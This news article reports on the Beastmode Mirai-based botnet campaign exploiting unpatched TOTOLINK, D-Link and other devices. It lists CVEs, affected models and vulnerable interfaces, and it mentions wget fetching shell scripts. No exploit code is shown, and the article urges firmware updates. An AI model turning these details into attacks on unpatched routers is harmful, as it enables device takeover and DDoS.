New Mirai-Based Campaign Targets Unpatched TOTOLINK RoutersFirmware Updated; Users Advised to Patch to Avoid DDoS Attacks
A new ongoing malware campaign is currently being conducted in the wild, targeting unpatched TOTOLINK routers. By leveraging a newly released exploit code, threat actors can potentially infect vulnerable devices, according to researchers at security firm FortiGuard Labs.
This variant of the Mirai botnet, called Beastmode, has been observed using newly disclosed vulnerabilities in TOTOLINK routers between February and March 2022. Researchers say the distributed denial-of-service campaign, Beastmode - aka B3astmode - was observed updating its arsenal by adding five more exploits, three of which were targeting various vulnerable models of TOTOLINK routers.
TOTOLINK is a brand owned by Zioncom, which is a Hong Kong-based manufacturer of network communication products, including wireless router/AP - indoor and outdoor, wireless USB adapter, wireless module, switch and wired router.
"This inclusion of TOTOLINK exploits is especially noteworthy as they were added just a week after the exploit codes were published on GitHub. We previously reported on the MANGA campaign, which similarly adopted exploit code within weeks of their release. By rapidly adopting newly released exploit code, threat actors can potentially infect vulnerable devices and expand their botnets before patches are applied to fix these vulnerabilities," FortiGuard Labs says.
TOTOLINK has released updated firmware for this affected hardware version, and users are encouraged to update their devices immediately.
"Mirai provided a solid base for many botnets in the last five years. The attack vectors and functionality provided by Mirai are adequate for building large-scale botnets. What differentiates Mirai-based botnets are the exploits, and it’s this part that requires maintenance. Exploits determine the ability to harvest new devices and grow the footprint of the botnet," says Pascal Geenens, director of threat intelligence at Radware.
He tells Information Security Media Group that botnets are mainly leveraged by attackers-for-hire and by booter and stresser service operators who monetize DDoS attacks; they have a wide reach because devices can be harvested around the globe, which makes botnets very useful tools to bypass geo-blocking restrictions.
Geenens says many booters and stresser services have been adding geographically based options so subscribers can perform attacks on targets from within a certain geographic location and bypass any geoblocking measures that may exist.
The latest Mirai-based Beastmode campaign derives its name from filenames and URLs used for its binary samples, as well as a unique HTTP User-Agent header "b3astmode" within the exploit requests. Researchers found that the binary samples were based on the publicly available source code of the Mirai botnet.
As with usual DDoS botnets, apart from using brute-forcing credential techniques, researchers say that Beastmode employs a variety of exploits to infect more devices.
The following is the list of exploited vulnerabilities in TOTOLINK routers. All of them have a CVSS score of 9.8 and are rated "critical."
- CVE-2022-26210 targets TOTOLINK A800R, A810R, A830R, A950RG, A3000RU and A3100R. This vulnerability allows attackers to execute arbitrary commands via a crafted request.
- CVE-2022-26186 targets TOTOLINK N600R and A7100RU. This vulnerability contains a command injection vulnerability via the exportOvpn interface at cstecgi.cgi.
- The flaws from CVE-2022-25075 through CVE-2022-25084 target TOTOLINK A810R, A830R, A860R, A950RG, A3100R, A3600R, T6, and T10 routers. They contain a command injection vulnerability in the "Main" function that allows attackers to execute arbitrary commands via the QUERY_STRING parameter.
The researchers found that in addition to TOTOLINK products, the threat actors behind this campaign target discontinued D-Link products - DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L and DIR-836L - via CVE-2021-45382.
The researchers say, "The samples caught on 20, Feb. 2022 contained a typo in the URL, where 'downloadFile.cgi' was used instead of 'downloadFlile.cgi' used by the devices. This had been fixed in samples captured three days later, suggesting active development and operation of this campaign." They add that the campaign "also attempts to exploit CVE-2021-4045," which they say is "a vulnerability for the TP-Link Tapo C200 IP camera, which we have not observed in other Mirai-based campaigns. While the current implementation of the exploit is incorrect, device owners should still update their camera firmware to fix this vulnerability."
FortiGuard Labs also found a couple of older vulnerabilities in the samples analyzed, including CVE-2017-17215, which targets Huawei HG532 routers, and CVE-2016-5674, which targets NUUO NVRmini2, NVRsolo, Crystal Devices and NETGEAR ReadyNAS Surveillance products.
"While affecting a variety of products, these vulnerabilities are all similar in that they allow threat actors to inject commands to be executed after successful exploitation. This usually involves using the wget command to download shell scripts to infect the device with Beastmode," the researchers say. "Once devices are infected by Beastmode, the botnet can be used by its operators to perform a variety of DDoS attacks commonly found in other Mirai-based botnets."
In December 2021, FortiGuard Labs researchers uncovered a malware campaign targeting unpatched TP-link wireless routers by leveraging a post-authenticated remote command execution (see: New Mirai-Based Campaign Targets Unpatched TP-Link Router).
The updated variant of the MANGA campaign, also known as Dark, distributes samples based on Mirai’s published source code.
FortiGuard Labs has been "actively monitoring" the Mirai-based DDoS botnet campaign, the researchers say, because of its "continuous updating of its list of target vulnerabilities - more so than other campaigns we have seen so far."